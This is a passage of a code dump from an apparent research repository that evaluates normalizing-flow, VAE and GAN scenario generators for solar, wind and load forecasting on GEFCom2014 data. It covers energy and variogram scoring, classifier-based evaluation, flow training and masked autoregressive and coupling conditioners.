print('#LS %s days #VS %s days # TEST %s days' % (nb_days_LS, nb_days_VS, nb_days_TEST))
# ------------------------------------------------------------------------------------------------------------------
# Rebuild the PV observations with the removed time periods
# ------------------------------------------------------------------------------------------------------------------
non_null_indexes = list(np.delete(np.asarray([i for i in range(24)]), indices))
if tag == 'pv':
# Rebuild the PV observations with the removed time periods
df_y_TEST.columns = non_null_indexes
for i in indices:
df_y_TEST[i] = 0
df_y_TEST = df_y_TEST.sort_index(axis=1)
# observations shape = (n_days, 24)
# scenarios shape = (24*n_days, n_s)
s_umnn_TEST = read_file(dir='scenarios/nfs/', name='scenarios_' + tag + '_UMNN_M_' + str(nf_umnn_id[tag]) + '_0_100_TEST')
# s_an_TEST = read_file(dir='scenarios/nfs/', name='scenarios_' + tag + '_AN_M_' + str(nf_a_id[tag]) + '_0_100_TEST')
s_vae_TEST = read_file(dir='scenarios/vae/', name='scenarios_' + tag + '_VAElinear_1_0_100_TEST')
s_gan_TEST = read_file(dir='scenarios/gan/', name='scenarios_' + tag + '_GAN_wasserstein_1_0_100_TEST')
# s_gc_TEST = read_file(dir='scenarios/gc/', name='scenarios_' + tag + '_gc_100_TEST')
s_rand_TEST = read_file(dir='scenarios/random/', name='scenarios_' + tag + '_random_100_TEST')
# models = ['UMNN', 'AN', 'VAE', 'GAN', 'GC', 'RAND']
models = ['NF', 'VAE', 'GAN', 'RAND']
es_res_track = []
vs_res_track = []
for s, m in zip([s_umnn_TEST, s_vae_TEST, s_gan_TEST, s_rand_TEST], models):
es_model = energy_score(s=s, y_true=df_y_TEST.values)
print("%s %s ES: %.2f" %(tag, m, 100 * np.mean(es_model)))
es_res_track.append(100 * np.mean(es_model))
vs_model = variogram_score(s=s, y_true=df_y_TEST.values, beta=beta)
print("%s %s VS: %.2f" %(tag, m, np.mean(vs_model)))
vs_res_track.append(np.mean(vs_model))
# DM test
p_value_es_track = compute_DM(score_l=es_res_track, multivariate=False)
p_value_vs_track = compute_DM(score_l=vs_res_track, multivariate=False)
plot_DM(p_value=p_value_es_track, dir=dir_path, pdf_name=tag + '_ES_DM_test')
plot_DM(p_value=p_value_vs_track, dir=dir_path, pdf_name=tag + '_VS_DM_test')
es_res_track = np.asarray(es_res_track)
vs_res_track = np.asarray(vs_res_track)
es_res.append(es_res_track)
vs_res.append(vs_res_track)
es_res = np.asarray(es_res)
vs_res = np.asarray(vs_res)
```
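The explicit double loop in `energy_score` above scales as O(n_s^2) per day in pure Python, which is fine for 100 scenarios but becomes slow for larger ensembles. A vectorized variant of the same formula, using pairwise distances, could look like the sketch below; it is illustrative only and not part of the repository.
```python
import numpy as np
from scipy.spatial.distance import pdist, cdist

def energy_score_vectorized(s: np.ndarray, y_true: np.ndarray) -> list:
    """Same Energy score as above, with the O(n_s^2) term vectorized.

    s: scenarios of shape (24*n_days, n_s), y_true: observations of shape (n_days, 24).
    """
    n_periods = y_true.shape[1]
    n_d, n_s = len(y_true), s.shape[1]
    es = []
    for d in range(n_d):
        s_d = s[n_periods * d:n_periods * (d + 1), :].T  # (n_s, 24)
        y_d = y_true[d, :][None, :]                       # (1, 24)
        term1 = cdist(s_d, y_d).mean()                    # (1/n_s) * sum_i ||s_i - y_d||
        term2 = pdist(s_d).sum() / (n_s * n_s)            # unordered pairs counted once = sum_{i,j}/2
        es.append(term1 - term2)
    return es
```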
#### File: GEFcom2014/forecast_quality/utils_clf.py
```python
import math
import os
import pickle
import random
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from GEFcom2014 import pv_data, wind_data, load_data, read_file
def build_true_data(tag: str):
"""
Build the true data on the LS, VS, and TEST sets.
:param tag: pv, load, wind.
:return: true data into a list.
"""
if tag == 'pv':
# WARNING: the time periods where PV is always 0 (night hours) are removed -> there are 8 periods removed
# The index of the time periods removed are provided into indices
data, indices = pv_data(path_name='../data/solar_new.csv', test_size=50, random_state=0)
elif tag == 'wind':
data = wind_data(path_name='../data/wind_data_all_zone.csv', test_size=50, random_state=0)
indices = []
elif tag == 'load':
data = load_data(path_name='../data/load_data_track1.csv', test_size=50, random_state=0)
indices = []
df_y_LS = data[1].copy()
df_y_VS = data[3].copy()
df_y_TEST = data[5].copy()
non_null_indexes = list(np.delete(np.asarray([i for i in range(24)]), indices))
if tag == 'pv':
# Rebuild the PV observations with the removed time periods
df_y_LS.columns = non_null_indexes
df_y_TEST.columns = non_null_indexes
df_y_VS.columns = non_null_indexes
for i in indices:
df_y_LS[i] = 0
df_y_VS[i] = 0
df_y_TEST[i] = 0
df_y_LS = df_y_LS.sort_index(axis=1)
df_y_VS = df_y_VS.sort_index(axis=1)
df_y_TEST = df_y_TEST.sort_index(axis=1)
# Add only the zone one-hot encoding feature
if tag == "pv":
x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,-3:].copy()])
x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,-3:].copy()])
x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,-3:].copy()])
elif tag == "wind":
x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,-10:].copy()])
x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,-10:].copy()])
x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,-10:].copy()])
else:
# only one zone for the load track
x_true_LS = df_y_LS.values
x_true_VS = df_y_VS.values
x_true_TEST = df_y_TEST.values
# true value is class 1
# false value is class 0
y_true_LS = np.tile(1, (len(x_true_LS), 1))
y_true_VS = np.tile(1, (len(x_true_VS), 1))
y_true_TEST = np.tile(1, (len(x_true_TEST), 1))
return [x_true_LS, x_true_VS, x_true_TEST, y_true_LS, y_true_VS, y_true_TEST], indices
def build_true_data_cond(tag: str):
"""
Build the true data on the LS, VS, and TEST sets.
:param tag: pv, load, wind.
:return: true data into a list.
"""
if tag == 'pv':
# WARNING: the time periods where PV is always 0 (night hours) are removed -> there are 8 periods removed
# The index of the time periods removed are provided into indices
data, indices = pv_data(path_name='../data/solar_new.csv', test_size=50, random_state=0)
elif tag == 'wind':
data = wind_data(path_name='../data/wind_data_all_zone.csv', test_size=50, random_state=0)
indices = []
elif tag == 'load':
data = load_data(path_name='../data/load_data_track1.csv', test_size=50, random_state=0)
indices = []
df_y_LS = data[1].copy()
df_y_VS = data[3].copy()
df_y_TEST = data[5].copy()
non_null_indexes = list(np.delete(np.asarray([i for i in range(24)]), indices))
# if tag == 'pv':
# # Rebuilt the PV observations with the removed time periods
# df_y_LS.columns = non_null_indexes
# df_y_TEST.columns = non_null_indexes
# df_y_VS.columns = non_null_indexes
#
# for i in indices:
# df_y_LS[i] = 0
# df_y_VS[i] = 0
# df_y_TEST[i] = 0
# df_y_LS = df_y_LS.sort_index(axis=1)
# df_y_VS = df_y_VS.sort_index(axis=1)
# df_y_TEST = df_y_TEST.sort_index(axis=1)
# Build the x and y of the clf
# if tag == "pv":
# x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,:-3].copy()])
# x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,:-3].copy()])
# x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,:-3].copy()])
# elif tag == "wind":
# x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,:-10].copy()])
# x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,:-10].copy()])
# x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,:-10].copy()])
if tag == "pv":
x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,:].copy()])
x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,:].copy()])
x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,:].copy()])
elif tag == "wind":
x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,:].copy()])
x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,:].copy()])
x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,:].copy()])
else:
x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,:].copy()])
x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,:].copy()])
x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,:].copy()])
# true value is class 1
# false value is class 0
y_true_LS = np.tile(1, (len(x_true_LS), 1))
y_true_VS = np.tile(1, (len(x_true_VS), 1))
y_true_TEST = np.tile(1, (len(x_true_TEST), 1))
# Check shape of data
# x_true shape should be LS/VS/TEST
# PV: (720*3/50*3/50*3, 16 + 16*5 +3)
# wind: (631*10/50*10/50*10, 24 + 24*10 +10)
# load: (1999/50/50, 24 + 25*5)
return [x_true_LS, x_true_VS, x_true_TEST, y_true_LS, y_true_VS, y_true_TEST], indices
def load_scenarios(dir: str, tag:str, name: str, i_clf:int=0):
"""
Load the ith scenario per day on the LS and TEST sets.
:param i_clf: ith scenario.
"""
if tag == 'load':
n_zones = 1
ls_size = 1999 # days / zone
elif tag == 'pv':
n_zones = 3
ls_size = 720 # days / zone
elif tag == 'wind':
n_zones = 10
ls_size = 631 # days / zone
# pick only one scenario per day
# scenarios are stored in an array of shape (24*n_days*n_zones, n_s)
s_model_temp = read_file(dir=dir, name='scenarios_' + tag + name+'_LS')
n_days = int(s_model_temp.shape[0]/24)
if len(s_model_temp) != int(24*ls_size*n_zones):
print('WARNING with #LS')
print(len(s_model_temp))
s_model_ls = s_model_temp[:, i_clf].reshape(n_days, 24) # (n_days*_n_zone, 24)
s_model_temp = read_file(dir=dir, name='scenarios_' + tag + name+'_TEST')
n_days = int(s_model_temp.shape[0]/24)
if len(s_model_temp) != int(24*50*n_zones):
print('WARNING with #TEST')
print(len(s_model_temp))
s_model_test = s_model_temp[:, i_clf].reshape(n_days, 24) # (n_days*_n_zone, 24)
# (n_days*_n_zone, 24)
return s_model_ls, s_model_test
def build_data_eval(true_data:list, model: str, tag: str, i_clf:int=0):
"""
Build the data for scenario evaluation using a classifier.
:param model:
:param tag:
:return:
"""
x_true_LS, x_true_VS, x_true_TEST, y_true_LS, y_true_VS, y_true_TEST = true_data
# ------------------------------------------------------------------------------------------------------------------
# 2. Load the scenarios
# ------------------------------------------------------------------------------------------------------------------
# load x_false -> scenarios
# (n_days*_n_zone, 24)
nf_a_id = {'pv': 10,
'wind': 8,
'load': 1}
nf_umnn_id = {'pv': 3,
'wind': 1,
'load': 1}
if model == 'NF-UMNN':
# print(tag, nf_umnn_id[tag])
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/nfs/', tag=tag, name='_UMNN_M_' + str(nf_umnn_id[tag]) + '_0_100', i_clf=i_clf)
elif model == 'NF-A':
# print(tag, nf_a_id[tag])
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/nfs/', tag=tag, name='_AN_M_' + str(nf_a_id[tag]) + '_0_100', i_clf=i_clf)
elif model == 'VAE':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/vae/', tag=tag, name='_VAElinear_1_0_100', i_clf=i_clf)
elif model == 'GAN':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/gan/', tag=tag, name='_GAN_wasserstein_1_0_100', i_clf=i_clf)
elif model == 'GC':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/gc/', tag=tag, name='_gc_100', i_clf=i_clf)
elif model == 'RAND':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/random/', tag=tag, name='_random_100', i_clf=i_clf)
if tag == 'pv':
n_zones = 3
# Add the zone one-hot encoding
x_false_LS = np.hstack([x_false_LS, x_true_LS[:, -n_zones:]])
x_false_TEST = np.hstack([x_false_TEST, x_true_TEST[:, -n_zones:]])
elif tag == 'wind':
n_zones = 10
# Add the zone one-hot encoding
x_false_LS = np.hstack([x_false_LS, x_true_LS[:, -n_zones:]])
x_false_TEST = np.hstack([x_false_TEST, x_true_TEST[:, -n_zones:]])
# 3. Build the dataset for the clf for a given time-series and model
X_LS = np.concatenate((x_false_LS, x_true_LS), axis=0)
X_TEST = np.concatenate((x_false_TEST, x_true_TEST), axis=0)
# true value is class 1
# false value is class 0
y_false_LS = np.tile([0], (len(x_false_LS), 1))
y_false_TEST = np.tile([0], (len(x_false_TEST), 1))
y_LS = np.concatenate((y_false_LS, y_true_LS), axis=0)
y_TEST = np.concatenate((y_false_TEST, y_true_TEST), axis=0)
# 4. Build & fit the clf
X_LS = [X_LS, x_false_LS, x_true_LS]
X_TEST = [X_TEST, x_false_TEST, x_true_TEST]
y_LS = [y_LS.reshape(-1), y_false_LS.reshape(-1), y_true_LS.reshape(-1)]
y_TEST = [y_TEST.reshape(-1), y_false_TEST.reshape(-1), y_true_TEST.reshape(-1)]
return X_LS, y_LS, X_TEST, y_TEST
def build_data_eval_cond(true_data:list, model: str, tag: str, pv_indices:np.array, i_clf:int=0):
"""
Build the data for scenario evaluation using a classifier.
:param model:
:param tag:
:return:
"""
x_true_LS, x_true_VS, x_true_TEST, y_true_LS, y_true_VS, y_true_TEST = true_data
# ------------------------------------------------------------------------------------------------------------------
# 2. Load the scenarios
# ------------------------------------------------------------------------------------------------------------------
# load x_false -> scenarios
# (n_days*_n_zone, 24)
nf_a_id = {'pv': 10,
'wind': 8,
'load': 1}
nf_umnn_id = {'pv': 3,
'wind': 1,
'load': 1}
if model == 'NF-UMNN':
# print(tag, nf_umnn_id[tag])
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/nfs/', tag=tag, name='_UMNN_M_' + str(nf_umnn_id[tag]) + '_0_100', i_clf=i_clf)
elif model == 'NF-A':
# print(tag, nf_a_id[tag])
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/nfs/', tag=tag, name='_AN_M_' + str(nf_a_id[tag]) + '_0_100', i_clf=i_clf)
elif model == 'VAE':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/vae/', tag=tag, name='_VAElinear_1_0_100', i_clf=i_clf)
elif model == 'GAN':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/gan/', tag=tag, name='_GAN_wasserstein_1_0_100', i_clf=i_clf)
elif model == 'GC':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/gc/', tag=tag, name='_gc_100', i_clf=i_clf)
elif model == 'RAND':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/random/', tag=tag, name='_random_100', i_clf=i_clf)
if tag == 'pv':
x_labels = ['$T$', '$I$', '$I^2$', '$I*T$', '$rh$']
n_zones = 3
# If PV dataset, remove the periods where the PV generation is always 0
x_false_LS = np.delete(x_false_LS, pv_indices, axis=1)
x_false_TEST = np.delete(x_false_TEST, pv_indices, axis=1)
elif tag == 'wind':
x_labels = ['$u^{10}$', '$u^{100}$', '$v^{10}$', '$v^{100}$', '$ws^{10}$', '$ws^{100}$', '$we^{10}$', '$we^{100}$', '$wd^{10}$', '$wd^{100}$']
n_zones = 10
elif tag == 'load':
n_f = 25
n_zones = 0
x_labels = ['w_'+str(i) for i in range(1, n_f+1)]
# print("Adding context...")
if tag == "pv":
tt = 24-8
else:
tt = 24
len_feature = len(x_labels)*tt + n_zones
# print("Adding {} features of {}".format(x_true_LS[:,-len_feature:].shape[1], tag))
# Add the context to the scenarios (the context is in x_true); context = weather forecasts + zone one-hot encoding
x_false_LS = np.hstack([x_false_LS, x_true_LS[:,-len_feature:]])
x_false_TEST = np.hstack([x_false_TEST, x_true_TEST[:,-len_feature:]])
# true value is class 1
# false value is class 0
y_false_LS = np.tile([0], (len(x_false_LS), 1))
y_false_TEST = np.tile([0], (len(x_false_TEST), 1))
# 3. Build the dataset for the clf for a given time-series and model
X_LS = np.concatenate((x_false_LS, x_true_LS), axis=0)
X_TEST = np.concatenate((x_false_TEST, x_true_TEST), axis=0)
y_LS = np.concatenate((y_false_LS, y_true_LS), axis=0)
y_TEST = np.concatenate((y_false_TEST, y_true_TEST), axis=0)
X_LS = [X_LS, x_false_LS, x_true_LS]
X_TEST = [X_TEST, x_false_TEST, x_true_TEST]
y_LS = [y_LS.reshape(-1), y_false_LS.reshape(-1), y_true_LS.reshape(-1)]
y_TEST = [y_TEST.reshape(-1), y_false_TEST.reshape(-1), y_true_TEST.reshape(-1)]
# check shapes
# X_LS, X_TEST should have shapes as follows:
# PV: (#LS *2 or #TEST *2, 16 + 16 * 5 +3)
# wind: (#LS *2 or #TEST *2, 24 + 24 * 10 +10)
# load: (#LS *2 or #TEST *2, 24 + 24 * 25)
return X_LS, y_LS, X_TEST, y_TEST
if __name__ == "__main__":
# Set the working directory to the root of the project
print(os.getcwd())
```
#### File: models/NFs/utils_NFs.py
```python
import math
import os
import torch
import random
import wandb
import pandas as pd
import numpy as np
from timeit import default_timer as timer
from sklearn.utils import shuffle
def build_nfs_scenarios(n_s: int, x: np.array, y_scaler, flow, conditioner_args, max:int=1, gpu:bool=True, tag:str= 'pv', non_null_indexes:list=[]):
"""
Build scenarios for a multi-output NF.
Scenarios are generated into an array (n_periods, n_s) where n_periods = 24 * n_days
:return: scenarios (n_periods, n_s)
"""
# to assign the data to GPU with .to(device) on the data
if gpu:
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
else:
device = "cpu"
flow.to(device)
if tag == 'pv':
n_periods_before = non_null_indexes[0]
n_periods_after = 24 - non_null_indexes[-1] - 1
print(n_periods_after, n_periods_before)
n_days = len(x)
nb_output, cond_in = conditioner_args['in_size'], conditioner_args['cond_in']
time_tot = 0.
scenarios = []
for i in range(n_days):
start = timer()
# sample nb_scenarios per day
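# Scenario generation: draw n_s latent samples z ~ N(0, I), tile the day's context n_s times,
# and invert the flow to map the latent samples back to the (scaled) target space.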
predictions = flow.invert(z=torch.randn(n_s, nb_output).to(device), context=torch.tensor(np.tile(x[i, :], n_s).reshape(n_s, cond_in)).to(device).float()).cpu().detach().numpy()
predictions = y_scaler.inverse_transform(predictions)
# corrections -> generation is always >= 0 and <= max capacity
predictions[predictions < 0] = 0
predictions[predictions > max] = max
if tag == 'pv':
# the time periods where PV can be non-zero are given by non_null_indexes
# for instance it could be [4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
# then it is needed to add 0 for periods [0, 1, 2, 3] and [20, 21, 22, 23]
scenarios_tmp = np.concatenate((np.zeros((predictions.shape[0], n_periods_before)), predictions, np.zeros((predictions.shape[0], n_periods_after))), axis=1) # shape = (n_s, 24)
else:
scenarios_tmp = predictions
scenarios.append(scenarios_tmp.transpose()) # list of arrays of shape (24, n_s)
end = timer()
time_tot += end - start
print("day {:.0f} Approximate time left : {:2f} min".format(i, time_tot / (i + 1) * (n_days - (i + 1))/60), end="\r",flush=True)
# if i % 20 == 0:
# print("day {:.0f} Approximate time left : {:2f} min".format(i, time_tot / (i + 1) * (nb_days - (i + 1)) / 60))
print('Scenario generation time_tot %.1f min' % (time_tot / 60))
return np.concatenate(scenarios,axis=0) # shape = (24*n_days, n_s)
def fit_NF(nb_epoch: int, x_LS: np.array, y_LS: np.array, x_VS: np.array, y_VS: np.array, x_TEST: np.array, y_TEST: np.array, flow, opt, batch_size:int=100, wdb:bool=False, gpu:bool=True):
"""
Fit the NF.
"""
# to assign the data to GPU with .to(device) on the data
if gpu:
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
else:
device = "cpu"
flow.to(device)
loss_list = []
time_tot = 0.
best_flow = flow
# WARNING: overrides the batch_size argument -> batch size = 10% of #LS
batch_size = int(0.1 * y_LS.shape[0])
for epoch in range(nb_epoch):
loss_tot = 0
start = timer()
# Shuffle the data randomly at each epoch
seed = random.randint(0, 2000)
x_LS_shuffled, y_LS_shuffled = shuffle(x_LS, y_LS, random_state=seed)
# batch of 100 days
# WARNING: if the NFs is single output, batch_size must be = 100 * 24 !!!
i = 0
loss_batch = 0
batch_list = [i for i in range(batch_size, batch_size * y_LS.shape[0] // batch_size, batch_size)]
for y_batch, x_batch in zip(np.split(y_LS_shuffled, batch_list), np.split(x_LS_shuffled, batch_list)):
# We compute the log-likelihood as well as the base variable, check NormalizingFlow class for other possibilities
ll, z = flow.compute_ll(x=torch.tensor(y_batch).to(device).float(), context=torch.tensor(x_batch).to(device).float())
# Here we would like to maximize the log-likelihood of our model!
loss = -ll.mean()
opt.zero_grad()
loss.backward()
opt.step()
loss_batch += loss.item()
i += 1
# LS loss is the average over all the batch
loss_ls = loss_batch / i
# VS loss
ll_vs, z_vs = flow.compute_ll(x=torch.tensor(y_VS).to(device).float(), context=torch.tensor(x_VS).to(device).float())
loss_vs = -ll_vs.mean().item()
# TEST loss
ll_test, z_test = flow.compute_ll(x=torch.tensor(y_TEST).to(device).float(), context=torch.tensor(x_TEST).to(device).float())
loss_test = -ll_test.mean().item()
# Save NF model when the VS loss is minimal
loss_list.append([loss_ls, loss_vs, loss_test])
ll_VS_min = np.nanmin(np.asarray(loss_list)[:, 1]) # ignore nan value when considering the min
if not math.isnan(loss_vs) and loss_vs <= ll_VS_min:
# print('NEW MIN ON VS at epoch %s loss_vs %.2f ll_VS_min %.2f' %(epoch, loss_vs, ll_VS_min))
best_flow = flow # update the best flow
# dump_file(dir=dir, name=name + '_'+str(epoch), file=best_flow)
end = timer()
time_tot += end - start
if wdb:
wandb.log({"ls loss": loss_ls})
wandb.log({"vs loss": loss_vs})
wandb.log({"test loss": loss_test})
wandb.log({"vs min loss": ll_VS_min})
if epoch % 10 == 0:
# print("Epoch {:.0f} Approximate time left : {:2f} min - LS loss: {:4f} VS loss: {:4f} TEST loss: {:4f}".format(epoch, time_tot / (epoch + 1) * (nb_epoch - (epoch + 1)) / 60, loss_ls, loss_vs, loss_test))
print("Epoch {:.0f} Approximate time left : {:2f} min - LS loss: {:4f} VS loss: {:4f} TEST loss: {:4f}".format(epoch, time_tot / (epoch + 1) * (nb_epoch - (epoch + 1)) / 60, loss_ls, loss_vs, loss_test), end="\r", flush=True)
print('Fitting time_tot %.0f min' %(time_tot/60))
return np.asarray(loss_list), best_flow, flow
```
#### File: models/Conditionners/AutoregressiveConditioner.py
```python
import numpy as np
from .Conditioner import Conditioner
import torch
import torch.nn as nn
import torch.nn.functional as F
class MaskedLinear(nn.Linear):
""" same as Linear except has a configurable mask on the weights """
def __init__(self, in_features, out_features, bias=True):
super().__init__(in_features, out_features, bias)
self.register_buffer('mask', torch.ones(out_features, in_features))
def set_mask(self, mask):
self.mask.data.copy_(torch.from_numpy(mask.astype(np.uint8).T))
def forward(self, input):
return F.linear(input, self.mask * self.weight, self.bias)
class MAN(nn.Module):
def __init__(self, nin, hidden_sizes, nout, num_masks=1, natural_ordering=False, random=False, device="cpu"):
"""
nin: integer; number of inputs
hidden sizes: a list of integers; number of units in hidden layers
nout: integer; number of outputs, which usually collectively parameterize some kind of 1D distribution
note: if nout is e.g. 2x larger than nin (perhaps the mean and std), then the first nin
will be all the means and the second nin will be stds. i.e. output dimensions depend on the
same input dimensions in "chunks" and should be carefully decoded downstream appropriately.
the output of running the tests for this file makes this a bit more clear with examples.
num_masks: can be used to train ensemble over orderings/connections
natural_ordering: force natural ordering of dimensions, don't use random permutations
"""
super().__init__()
self.random = random
self.nin = nin
self.nout = nout
self.hidden_sizes = hidden_sizes
#assert self.nout % self.nin == 0, "nout must be integer multiple of nin"
# define a simple MLP neural net
self.net = []
hs = [nin] + hidden_sizes + [nout]
for h0, h1 in zip(hs, hs[1:]):
self.net.extend([
MaskedLinear(h0, h1),
nn.ReLU(),
])
self.net.pop() # pop the last ReLU for the output layer
self.net = nn.Sequential(*self.net)
# seeds for orders/connectivities of the model ensemble
self.natural_ordering = natural_ordering
self.num_masks = num_masks
self.seed = 0 # for cycling through num_masks orderings
self.m = {}
self.update_masks() # builds the initial self.m connectivity
# note, we could also precompute the masks and cache them, but this
# could get memory expensive for large number of masks.
def update_masks(self):
if self.m and self.num_masks == 1: return # only a single seed, skip for efficiency
L = len(self.hidden_sizes)
# fetch the next seed and construct a random stream
rng = np.random.RandomState(self.seed)
self.seed = (self.seed + 1) % self.num_masks
# sample the order of the inputs and the connectivity of all neurons
if self.random:
self.m[-1] = np.arange(self.nin) if self.natural_ordering else rng.permutation(self.nin)
for l in range(L):
self.m[l] = rng.randint(self.m[l - 1].min(), self.nin - 1, size=self.hidden_sizes[l])
else:
self.m[-1] = np.arange(self.nin)
for l in range(L):
self.m[l] = np.array([self.nin - 1 - (i % self.nin) for i in range(self.hidden_sizes[l])])
# construct the mask matrices
masks = [self.m[l - 1][:, None] <= self.m[l][None, :] for l in range(L)]
masks.append(self.m[L - 1][:, None] < self.m[-1][None, :])
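# Each hidden unit u in layer l is assigned a degree m[l][u]; the mask allows a connection from a
# unit of degree k to a unit of degree >= k in the next hidden layer, and the output mask uses a
# strict inequality so that output dimension k only depends on inputs with degree < k.
# This is what makes the network autoregressive (MADE-style masking).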
# handle the case where nout = nin * k, for integer k > 1
if self.nout > self.nin:
k = int(self.nout / self.nin)
# replicate the mask across the other outputs
masks[-1] = np.concatenate([masks[-1]] * k, axis=1)
# set the masks in all MaskedLinear layers
layers = [l for l in self.net.modules() if isinstance(l, MaskedLinear)]
for l, m in zip(layers, masks):
l.set_mask(m)
# map between in_d and order
self.i_map = self.m[-1].copy()
for k in range(len(self.m[-1])):
self.i_map[self.m[-1][k]] = k
def forward(self, x):
return self.net(x).view(x.shape[0], -1, x.shape[1]).permute(0, 2, 1)
# ------------------------------------------------------------------------------
class ConditionnalMAN(MAN):
def __init__(self, nin, cond_in, hidden_sizes, nout, num_masks=1, natural_ordering=False, random=False,
device="cpu"):
"""
nin: integer; number of inputs
hidden sizes: a list of integers; number of units in hidden layers
nout: integer; number of outputs, which usually collectively parameterize some kind of 1D distribution
note: if nout is e.g. 2x larger than nin (perhaps the mean and std), then the first nin
will be all the means and the second nin will be stds. i.e. output dimensions depend on the
same input dimensions in "chunks" and should be carefully decoded downstream appropriately.
the output of running the tests for this file makes this a bit more clear with examples.
num_masks: can be used to train ensemble over orderings/connections
natural_ordering: force natural ordering of dimensions, don't use random permutations
"""
super().__init__(nin + cond_in, hidden_sizes, nout, num_masks, natural_ordering, random, device)
self.nin_non_cond = nin
self.cond_in = cond_in
def forward(self, x, context):
if context is not None:
out = super().forward(torch.cat((context, x), 1))
else:
out = super().forward(x)
out = out.contiguous()[:, self.cond_in:, :]
return out
class AutoregressiveConditioner(Conditioner):
"""
in_size: The dimension of the input vector, this corresponds to the number of autoregressive output vectors.
hidden: The dimension of the masked autoregressive neural network hidden layers.
out_size: The dimension of the output vectors.
cond_in: The dimension of the additional context input.
"""
def __init__(self, in_size, hidden, out_size, cond_in=0):
super(AutoregressiveConditioner, self).__init__()
self.in_size = in_size
self.masked_autoregressive_net = ConditionnalMAN(in_size, cond_in=cond_in, hidden_sizes=hidden, nout=out_size*(in_size + cond_in))
self.register_buffer("A", 1 - torch.tril(torch.ones(in_size, in_size)).T)
"""
x: An input tensor with dim=[b_size, in_size]
context: A context/conditionning tensor with dim=[b_size, cond_in]
return: An autoregressive embedding tensor of x conditionned on context, its dim is=[b_size, in_size, out_size]
"""
def forward(self, x, context=None):
return self.masked_autoregressive_net(x, context)
def depth(self):
return self.in_size - 1
```
#### File: models/Conditionners/CouplingConditioner.py
```python
from .Conditioner import Conditioner
import torch
import torch.nn as nn
class CouplingMLP(nn.Module):
def __init__(self, in_size, hidden, out_size, cond_in = 0):
super(CouplingMLP, self).__init__()
l1 = [in_size - int(in_size/2) + cond_in] + hidden
l2 = hidden + [out_size * int(in_size/2)]
layers = []
for h1, h2 in zip(l1, l2):
layers += [nn.Linear(h1, h2), nn.ReLU()]
layers.pop()
self.net = nn.Sequential(*layers)
def forward(self, x):
return self.net(x)
class CouplingConditioner(Conditioner):
def __init__(self, in_size, hidden, out_size, cond_in=0):
super(CouplingConditioner, self).__init__()
self.in_size = in_size
self.out_size = out_size
self.cond_size = int(in_size/2)
self.indep_size = in_size - self.cond_size
self.embeding_net = CouplingMLP(in_size, hidden, out_size, cond_in)
self.constants = nn.Parameter(torch.randn(self.indep_size, out_size))
self.register_buffer("A", torch.cat((torch.zeros(self.cond_size, in_size),
torch.cat((torch.ones(self.indep_size, self.cond_size), torch.zeros(self.indep_size, self.indep_size)), 1)), 0))
def forward(self, x, context=None):
if context is not None:
x = torch.cat((x, context), 1)
h1 = self.constants.unsqueeze(0).expand(x.shape[0], -1, -1)
h2 = self.embeding_net(x[:, :self.indep_size]).view(x.shape[0], self.cond_size, self.out_size)
return torch.cat((h1, h2), 1)
def depth(self):
return 1
```
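For intuition, the coupling conditioner above implements the standard coupling-layer trick: one half of the dimensions receives input-independent (learned constant) parameters, while the parameters of the other half are computed from the first half only, so the resulting transformation has a triangular Jacobian and can be inverted in a single pass. A minimal, self-contained affine coupling step illustrating the idea (not the repository's classes) is sketched below.
```python
import torch
import torch.nn as nn

class ToyAffineCoupling(nn.Module):
    """Minimal affine coupling step: x2 is rescaled/shifted by a function of x1 only."""

    def __init__(self, dim: int, hidden: int = 32):
        super().__init__()
        self.d1 = dim - dim // 2                      # dims left unchanged
        self.net = nn.Sequential(nn.Linear(self.d1, hidden), nn.ReLU(),
                                 nn.Linear(hidden, 2 * (dim // 2)))  # scale and shift for x2

    def forward(self, x):
        x1, x2 = x[:, :self.d1], x[:, self.d1:]
        log_s, t = self.net(x1).chunk(2, dim=1)
        y2 = x2 * torch.exp(log_s) + t
        log_det = log_s.sum(dim=1)                    # triangular Jacobian -> sum of log-scales
        return torch.cat((x1, y2), dim=1), log_det

    def inverse(self, y):
        y1, y2 = y[:, :self.d1], y[:, self.d1:]
        log_s, t = self.net(y1).chunk(2, dim=1)       # y1 == x1, so the parameters are recoverable
        x2 = (y2 - t) * torch.exp(-log_s)
        return torch.cat((y1, x2), dim=1)

# quick invertibility check
layer = ToyAffineCoupling(dim=6)
x = torch.randn(4, 6)
y, _ = layer(x)
print(torch.allclose(layer.inverse(y), x, atol=1e-5))  # True
```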
#### File: models/Conditionners/DAGConditioner.py
```python
import torch
import torch.nn as nn
from .Conditioner import Conditioner
import networkx as nx
